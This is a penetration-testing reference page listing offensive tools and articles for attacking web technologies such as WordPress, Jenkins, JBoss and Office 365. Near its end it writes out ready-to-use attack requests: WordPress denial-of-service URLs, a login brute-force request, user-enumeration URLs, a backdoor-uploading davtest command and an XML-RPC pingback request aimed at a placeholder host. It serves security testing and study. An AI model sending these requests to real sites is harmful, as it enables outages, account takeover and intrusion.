Adobe AEM
- aem-hacker - Tools to identify vulnerable Adobe Experience Manager (AEM) webapps.
- aemscan - Adobe Experience Manager Vulnerability Scanner
- https://github.com/emadshanab/Adobe-Experience-Manager/blob/main/aem-paths.txt
- https://resources.infosecinstitute.com/topic/adobe-cq-pentesting-guide-part-1/
- https://www.slideshare.net/0ang3el/hacking-aem-sites
- https://experienceleague.adobe.com/docs/experience-manager-release-information/aem-release-updates/previous-updates/aem-previous-versions.html
Apache Web Server
- apache-users - This Perl script will enumerate the usernames on any system that uses Apache with the UserDir module
APIs
- https://github.com/shieldfy/API-Security-Checklist
- https://github.com/OWASP/API-Security/blob/master/2019/en/dist/owasp-api-security-top-10.pdf
- https://hackanythingfor.blogspot.com/2020/07/api-testing-checklist.html
- https://cheatsheetseries.owasp.org/cheatsheets/REST_Assessment_Cheat_Sheet.html
- https://cheatsheetseries.owasp.org/cheatsheets/REST_Security_Cheat_Sheet.html
- https://pentestbook.six2dez.com/enumeration/webservices/apis
- https://github.com/0xCGonzalo/Golden-Guide-for-Pentesting/tree/master/API%20Security
- https://cheatsheet.haax.fr/web-pentest/attacking_apis/
- https://infosecwriteups.com/31-tips-api-security-pentesting-480b5998b765?gi=4d455b3b778f
- https://github.com/dxa4481/AttackingAndDefendingTheGCPMetadataAPI/blob/master/README.md
- https://github.com/streaak/keyhacks
- https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d - API Endpoint wordlist
- imperva/automatic-api-attack-tool - Imperva's customizable API attack tool takes an API specification as an input, generates and runs attacks that are based on it as an output.
- Astra - Automated Security Testing for REST APIs
- OWASP API check - APICheck is an environment for integrating existing HTTP API tools and creating execution chains easily.
- VX-API - Collection of various WINAPI tricks / features used or abused by Malware
- https://malapi.io/ - Cheatsheet for commands that could be potentially used for malicious activity.
- crAPI - completely ridiculous API (crAPI) will help you to understand the ten most critical API security risks. crAPI is vulnerable by design, but you'll be able to safely run it to educate/train yourself.
- https://github.com/Net-hunter121/API-Wordlist - A wordlist of API names used for fuzzing web application APIs.
- https://github.com/metlo-labs/metlo - Metlo is an open-source API security platform
- Hacking: The next generation - Application Protocol Handlers, pg. 96
For training on APIs and API hacking, please see https://github.com/jassics/security-study-plan/blob/main/api-security-study-plan.md
API: GraphQL
- InQL - A Burp Extension for GraphQL Security Testing
- https://hackernoon.com/understanding-graphql-part-1-nxm3uv9
- https://graphql.org/learn/introspection/
- https://jondow.eu/practical-graphql-attack-vectors/
- https://lab.wallarm.com/securing-and-attacking-graphql-part-1-overview/
- https://medium.com/@apkash8/graphql-vs-rest-api-model-common-security-test-cases-for-graphql-endpoints-5b723b1468b4
- https://the-bilal-rizwan.medium.com/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696
ASP.NET
- viewgen - a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keys
Cloudflare
- cloudflare_enum - Cloudflare DNS Enumeration Tool for Pentesters
Drupal
- droopescan - plugin-based scanner that aids security researchers in identifying issues with several CMSs.
- drupwn - Drupal enumeration & exploitation tool
- https://hackertarget.com/drupal-security-scan/
- Drupal: Reverse Shell
Firebase
- Insecure-Firebase-Exploit - A simple Python exploit to write data to insecure/vulnerable Firebase databases, commonly found inside mobile apps. If the owner of the app has set the security rules to true for both "read" and "write", an attacker can probably dump the database and write their own data to the Firebase DB.
- Firebase-Extractor - A tool written in Python for scraping Firebase data
- Pyrebase - A simple Python wrapper for the Firebase API.
- https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty/
Flask
- Flask-Unsign - Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys.
Google Web Toolkit
- GWTMap - GWTMap is a tool to help map the attack surface of Google Web Toolkit (GWT) based applications.
.htaccess File
- htshells - htshells is a series of web-based attacks based around .htaccess files. Most of the attacks fall into two categories: remote code/command execution and information disclosure.
Java Applets
- Advanced Penetration Testing: Using the Java Applet for Payload Delivery - pg. 31
JavaScript
- JSScanner - Scan JS Files for Endpoints and Secrets
- JSFScan.sh - Automation for JavaScript recon in bug bounty.
- jshole - A JavaScript components vulnerability scanner, based on RetireJS
- Retire.JS - Burp/ZAP/Maven extension that integrates the Retire.js repository to find vulnerable JavaScript libraries.
- JSshell - JavaScript reverse/remote shell from XSS
- unmap - Unpack a JavaScript Source Map back into filesystem structure
- JSA - JavaScript security analysis (JSA) is a program for JavaScript analysis during web application security assessments.
- https://securityjunky.com/scanning-js-files-for-endpoint-and-secrets/
JBoss
- jboss-autopwn - This JBoss script deploys a JSP shell on the target JBoss AS server. Once deployed, the script uses its upload and command execution capability to provide an interactive session.
- jexboss - JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool
Jenkins
- pwn_jenkins - Notes about attacking Jenkins servers
- Accenture/jenkins-attack-framework - Project for enumerating and attacking Jenkins
- https://pentestbook.six2dez.com/enumeration/webservices/jenkins
- https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md
Jira
- https://pentestbook.six2dez.com/enumeration/webservices/jira
- https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md
- jira_scan - A simple remote scanner for Atlassian Jira
Joomla
- JCS - JCS (Joomla Component Scanner) made for penetration testing purpose on Joomla CMS
- Joomscan - OWASP Joomla! Vulnerability Scanner (JoomScan) is an open source project, developed with the aim of automating the task of vulnerability detection and reliability assurance in Joomla CMS deployments.
- juumla - Juumla is a Python tool created to identify the Joomla version, scan for vulnerabilities and search for config files.
- Joomla: Reverse Shell
JSON Web Tokens
- jwt_tool - A toolkit for testing, tweaking and cracking JSON Web Tokens
- jwt-hack - jwt-hack is a tool for hacking / security testing of JWTs. It supports encoding/decoding JWTs, generating payloads for JWT attacks and very fast cracking (dictionary/brute force).
- jwt-pwn - Security Testing Scripts for JWT
- https://trustfoundry.net/jwt-hacking-101/
- https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9
- https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/
- https://medium.com/swlh/hacking-json-web-tokens-jwts-9122efe91e4a
- https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6
Magento
- magescan - Scan a Magento site for information
- https://magescan.com/
- https://github.com/steverobbins/magento-version-identification-php
MSExchange
NGINX
- nginxpwner - Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulnerabilities.
{% content-ref url="oauth-2.0.md" %} oauth-2.0.md {% endcontent-ref %}
OneLogin - SAML
- SAMLExtractor - A tool that takes a URL or a list of URLs and prints back the SAML consume URL.
OWA/O365
- MailSniper - MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-administrative user to search their own email, or by an administrator to search the mailboxes of every user in a domain.
- byt3bl33d3r/SprayingToolkit - Scripts to make password spraying attacks against Lync/S4B, OWA & O365 a lot quicker, less painful and more efficient
- o365enum - Enumerate valid usernames from Office 365 using ActiveSync, Autodiscover v1, or office.com login page.
- o365-attack-toolkit - o365-attack-toolkit allows operators to perform oauth phishing attacks.
- http://www.blackhillsinfosec.com/?p=4694 - UserName Recon/Password Spraying
- http://www.blackhillsinfosec.com/?p=5089 - Password Spraying MFA/2FA
- http://www.blackhillsinfosec.com/?p=5330 - Password Spraying/GlobalAddressList
- http://www.blackhillsinfosec.com/?p=5396 - Outlook 2FA Bypass
- https://silentbreaksecurity.com/malicious-outlook-rules/ - Malicious Outlook Rules
- http://www.blackhillsinfosec.com/?p=5465 - Outlook Rules in Action
PHP
Redis
Ruby on Rails
- brakeman - A static analysis security vulnerability scanner for Ruby on Rails applications
SAP
- SAP_RECON - PoC for CVE-2020-6287, CVE-2020-6286 (SAP RECON vulnerability)
- https://github.com/shipcod3/mySapAdventures
- https://github.com/emadshanab/SAP-wordlist/blob/main/SAP-wordlist.txt
- https://buddysap.com/list-of-sap-port-used-in-sap-abap-and-java-system/
{% content-ref url="ssl-tls-and-certificates.md" %} ssl-tls-and-certificates.md {% endcontent-ref %}
Virtual Hosts
- virtual-host-discovery - A script to enumerate virtual hosts on a server.
- vhosts-sieve - Searching for virtual hosts among non-resolvable domains
- VHostScan - A virtual host scanner that performs reverse lookups, can be used with pivot tools, detects catch-all scenarios, and works around wildcards, aliases and dynamic default pages.
{% content-ref url="web-application-firewall.md" %} web-application-firewall.md {% endcontent-ref %}
WebDav
- davtest - Scan the given WebDAV server
$ davtest -move -sendbd auto -url http://$ip:8080/webdav/
- cadaver - A command-line WebDAV client for Unix.
$ cadaver http://$ip:8080/webdav/
Web Proxies
- https://github.com/GrrrDog/weird_proxies - Reverse proxies cheatsheet
WordPress - Resources
- WPScan - The WordPress Vulnerability Scanner
- https://wpsec.com/ - Online WordPress scanner
- WPScan: WordPress Pentesting Framework
- Wordpress Exploit Framework - A Ruby framework designed to aid in the penetration testing of WordPress systems.
- WPSploit - This repository is designed for creating and/or porting of specific exploits for WordPress using metasploit as exploitation tool.
- xmlrpc-scan - Scan a list of URLs or a single URL for WordPress XML-RPC issues.
- wpxploit - Simple Python script for performing an XML-RPC dictionary attack
- plecost - WordPress fingerprinting tool; plecost searches for and retrieves information about the plugin versions installed on WordPress systems.
- XMLRPC Attacks
- https://kathan19.gitbook.io/howtohunt/cms/wordpress
- WordPress Pentest Lab Setup in Multiple Ways
- Multiple Ways to Crack WordPress login
- WordPress: Reverse Shell
WordPress Common Bugs
- Denial of Service via load-scripts.php
http://target.com/wp-admin/load-scripts.php?load=react,react-dom,moment,lodash,wp-polyfill-fetch,wp-polyfill-formdata,wp-polyfill-node-contains,wp-polyfill-url,wp-polyfill-dom-rect,wp-polyfill-element-closest,wp-polyfill,wp-block-library,wp-edit-post,wp-i18n,wp-hooks,wp-api-fetch,wp-data,wp-date,editor,colorpicker,media,wplink,link,utils,common,wp-sanitize,sack,quicktags,clipboard,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-reply,json2,underscore,backbone,wp-util,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrate,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,esprima,jshint,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-bar,wplink,wpdialogs,word-count,media-upload,hoverIntent,hoverintent-js,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embed,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,site-health,privacy-tools,updates,farbtastic,iris,wp-color-picker,dashboard,list-revisions,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter
- Denial of Service via load-styles.php
http://target.com/wp-admin/load-styles.php?&load=common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,widgets,site-icon,l10n,install,wp-color-picker,customize-controls,customize-widgets,customize-nav-menus,customize-preview,ie,login,site-health,buttons,admin-bar,wp-auth-check,editor-buttons,media-views,wp-pointer,wp-jquery-ui-dialog,wp-block-library-theme,wp-edit-blocks,wp-block-editor,wp-block-library,wp-components,wp-edit-post,wp-editor,wp-format-library,wp-list-reusable-blocks,wp-nux,deprecated-media,farbtastic
- Log files exposed
http://target.com/wp-content/debug.log
- Backup file wp-config exposed
.wp-config.php.swp
wp-config.inc
wp-config.old
wp-config.txt
wp-config.html
wp-config.php.bak
wp-config.php.dist
wp-config.php.inc
wp-config.php.old
wp-config.php.save
wp-config.php.swp
wp-config.php.txt
wp-config.php.zip
wp-config.php.html
wp-config.php~
- Information disclosure: WordPress usernames
http://target.com/?author=1
http://target.com/wp-json/wp/v2/users
http://target.com/?rest_route=/wp/v2/users
- Brute force against wp-login.php
POST /wp-login.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1
- XSPA (cross-site port attack) via the WordPress XML-RPC pingback
POST /xmlrpc.php HTTP/1.1
Host: target.com
Content-Type: text/xml

<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://yourip:port</string></value>
</param><param>
<value>
<string>https://target.com/</string>
</value>
</param></params>
</methodCall>
Source: https://github.com/daffainfo/AllAboutBugBounty/blob/master/CMS/WordPress.md
{% embed url="https://youtu.be/sQ4TtFdaiRA" %}